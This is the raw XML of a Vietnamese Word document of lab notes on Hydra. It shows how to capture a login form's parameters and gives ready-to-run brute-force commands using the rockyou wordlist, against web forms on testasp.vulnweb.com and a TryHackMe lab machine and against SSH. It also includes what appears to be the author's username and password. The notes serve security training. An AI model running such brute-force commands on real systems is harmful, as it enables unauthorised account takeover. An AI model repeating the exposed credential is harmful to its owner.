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55D00" w14:textId="2742446E" w:rsidR="00345DF0" w:rsidRPr="00244AF4" w:rsidRDefault="00DF5296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk79151523"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447EC34" w14:textId="453A4FF3" w:rsidR="00DF5296" w:rsidRDefault="00DF5296">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919F70A" w14:textId="476E806B" w:rsidR="00DF5296" w:rsidRDefault="00E15DAA">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00DF5296" w:rsidRPr="004362F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DF5296" w:rsidRPr="00DF5296">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75415A3E" w14:textId="426F9216" w:rsidR="00DF5296" w:rsidRDefault="00DF5296">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D441EAC" wp14:editId="132BD454">
            <wp:extent cx="5943600" cy="191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6084" w14:textId="79208D10" w:rsidR="00DF5296" w:rsidRDefault="00DF5296"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Kali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ctrl + shift + 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Deverlopment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CE8CF9F" w14:textId="5D0049F7" w:rsidR="00DF5296" w:rsidRDefault="00DF5296">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tab Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0A903" w14:textId="6F2270CE" w:rsidR="00DF5296" w:rsidRDefault="00DF5296" w:rsidP="00DF5296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1 user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form POST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E7424" w14:textId="0DD3DA73" w:rsidR="00DF5296" w:rsidRDefault="00DF5296" w:rsidP="00DF5296"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POST 200 (login) </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t>edit and resent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137022FB" w14:textId="5E3E2965" w:rsidR="00DF5296" w:rsidRDefault="00DF5296" w:rsidP="00DF5296">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11C6DE89" wp14:editId="4E6D5B25">
            <wp:extent cx="5943600" cy="2363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DB12" w14:textId="69EB089B" w:rsidR="00DF5296" w:rsidRDefault="00DF5296" w:rsidP="00DF5296">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chú</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ý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</w:p>
    <w:p w14:paraId="3FB4F43B" w14:textId="5BD6F1F4" w:rsidR="00DF5296" w:rsidRDefault="00DF5296">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4407F1F7" wp14:editId="47672A84">
            <wp:extent cx="5943600" cy="1294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FBF9" w14:textId="5FD63454" w:rsidR="00DF5296" w:rsidRPr="00244AF4" w:rsidRDefault="00DF5296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vậy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> form </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A26B49" w14:textId="415717F7" w:rsidR="00DF5296" w:rsidRDefault="00E15DAA">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00DF5296" w:rsidRPr="004362F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DF5296" w:rsidRPr="00DF5296">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F018C7" w14:textId="18C4E7F7" w:rsidR="00DF5296" w:rsidRDefault="00DF5296">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF5296">
        <w:t>tfUName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF5296">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF5296">
        <w:t>abc&amp;tfUPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF5296">
        <w:t>=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503A73A" w14:textId="2393144D" w:rsidR="00DF5296" w:rsidRPr="00244AF4" w:rsidRDefault="00DF5296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hợp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E90E2" w14:textId="66FD55E2" w:rsidR="00DF5296" w:rsidRDefault="00244AF4">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DF5296">
        <w:t>/Login.asp?RetURL=/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DF5296">
        <w:t>Default.asp?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DF5296">
        <w:t>tfUName=^USER^&amp;tfUPass=^PASS^:S=logout”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD4AC0D" w14:textId="54939523" w:rsidR="00244AF4" w:rsidRPr="00244AF4" w:rsidRDefault="00244AF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vậy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482299C3" w14:textId="3638E1AA" w:rsidR="00244AF4" w:rsidRDefault="00244AF4" w:rsidP="00244AF4">
      <w:r>
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FFFF8C" w14:textId="7D7F16B1" w:rsidR="00244AF4" w:rsidRDefault="00244AF4" w:rsidP="00244AF4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD349C" w14:textId="615B0FEE" w:rsidR="00244AF4" w:rsidRPr="00244AF4" w:rsidRDefault="00244AF4" w:rsidP="00244AF4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form "/Login.asp?RetURL=/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Default.asp?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>tfUName=^USER^&amp;tfUPass=^PASS^:S=logout" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244AF4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382401EE" w14:textId="055A745D" w:rsidR="00DF5296" w:rsidRDefault="009413C2">
      <w:r>
        <w:t xml:space="preserve"> LAB 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2EC383" w14:textId="219818DF" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dùng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FEECE4" w14:textId="1CFBFFF3" w:rsidR="009413C2" w:rsidRDefault="00E15DAA">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="009413C2" w:rsidRPr="0029416B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/hydra#</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F6F62AE" w14:textId="65F25B20" w:rsidR="009413C2" w:rsidRDefault="009413C2"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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EC001" w14:textId="6BDCF2D1" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:t>hungtn    Hung@1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C2B7F" w14:textId="280C5200" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dùng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nồi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tới</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="546095BC" w14:textId="1F64F433" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50253B98" wp14:editId="1761D63F">
            <wp:extent cx="5943600" cy="4526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CAD" w14:textId="59898857" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:t xml:space="preserve">Download your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Openvpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C404B99" w14:textId="1C231DCD" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:t xml:space="preserve">Down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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3B11B9" w14:textId="5E60A4E2" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53732A35" wp14:editId="17F99F4A">
            <wp:extent cx="5441152" cy="149364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6B7C" w14:textId="19EB334C" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CFBADB3" wp14:editId="486D087B">
            <wp:extent cx="5364945" cy="4016088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B190" w14:textId="4672ECB4" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Giữ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nguyen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41EF9347" w14:textId="17D63AB3" w:rsidR="009413C2" w:rsidRDefault="009413C2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tryhackme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start VM ở task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C09057" w14:textId="17865FCB" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1915A4FF" wp14:editId="00278EA2">
            <wp:extent cx="5943600" cy="1096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CD49" w14:textId="3E447D65" w:rsidR="009413C2" w:rsidRDefault="004176DE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Đợi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1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Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B61DB" w14:textId="7E3A6802" w:rsidR="004176DE" w:rsidRDefault="004176DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B51D53" wp14:editId="3EE414D9">
            <wp:extent cx="5943600" cy="1075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A20A" w14:textId="77777777" w:rsidR="009413C2" w:rsidRDefault="009413C2"/>
    <w:p w14:paraId="0AAA422D" w14:textId="185D35D3" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r w:rsidRPr="009413C2">
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>/share/wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF488D3" w14:textId="4331F519" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009413C2">
        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB29D51" w14:textId="3BFD28FE" w:rsidR="009413C2" w:rsidRDefault="009413C2">
      <w:r w:rsidRPr="009413C2">
        <w:lastRenderedPageBreak/>
        <w:t>hydra -l molly -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>/share/wordlists/rockyou.txt 10.10.39.30 http-post-form "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>login:username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009413C2">
        <w:t>=^USER^&amp;password=^PASS^:F=Your username or password is incorrect." -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A7329" w14:textId="4A8CFC01" w:rsidR="004176DE" w:rsidRDefault="004176DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EB8101" wp14:editId="11E2F2E5">
            <wp:extent cx="5943600" cy="3834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90C6" w14:textId="77777777" w:rsidR="004176DE" w:rsidRDefault="004176DE"/>
    <w:p w14:paraId="68841A19" w14:textId="33120D49" w:rsidR="004176DE" w:rsidRDefault="001C5D50">
      <w:r>
        <w:t>Hydra SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694701A" w14:textId="07C7D54F" w:rsidR="001C5D50" w:rsidRDefault="001C5D50">
      <w:r w:rsidRPr="001C5D50">
        <w:t>hydra -l molly -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C5D50">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C5D50">
        <w:t>/share/wordlists/rockyou.txt 10.10.</w:t>
      </w:r>
      <w:r>
        <w:t>39.30</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5D50">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C5D50">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C5D50">
        <w:t xml:space="preserve"> -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184EF9CA" w14:textId="75D1AD93" w:rsidR="00E15DAA" w:rsidRDefault="00E15DAA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FCC6C2" wp14:editId="45CEFED4">
            <wp:extent cx="4876800" cy="2065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4" cy="20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6B09" w14:textId="77777777" w:rsidR="001C5D50" w:rsidRDefault="001C5D50"/>
    <w:p w14:paraId="22755AFA" w14:textId="77777777" w:rsidR="001C5D50" w:rsidRDefault="001C5D50"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="62902BA7" w14:textId="77777777" w:rsidR="00DF5296" w:rsidRDefault="00DF5296"/>
    <w:sectPr w:rsidR="00DF5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296"/>
    <w:rsid w:val="001C5D50"/>
    <w:rsid w:val="00244AF4"/>
    <w:rsid w:val="00345DF0"/>
    <w:rsid w:val="0035522D"/>
    <w:rsid w:val="004176DE"/>
    <w:rsid w:val="00722B25"/>
    <w:rsid w:val="009413C2"/>
    <w:rsid w:val="00DF5296"/>
    <w:rsid w:val="00E1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E94FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BA3ABC09-5EAD-4420-BE46-A2BBDF7C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52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stasp.vulnweb.com/Login.asp?RetURL=/Default.asp" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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image" Target="media/image6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5.tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.tmp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hyperlink" Target="http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/hydra" TargetMode="External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5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hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Trinh Ngoc Hung</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-02T04:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-12T18:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>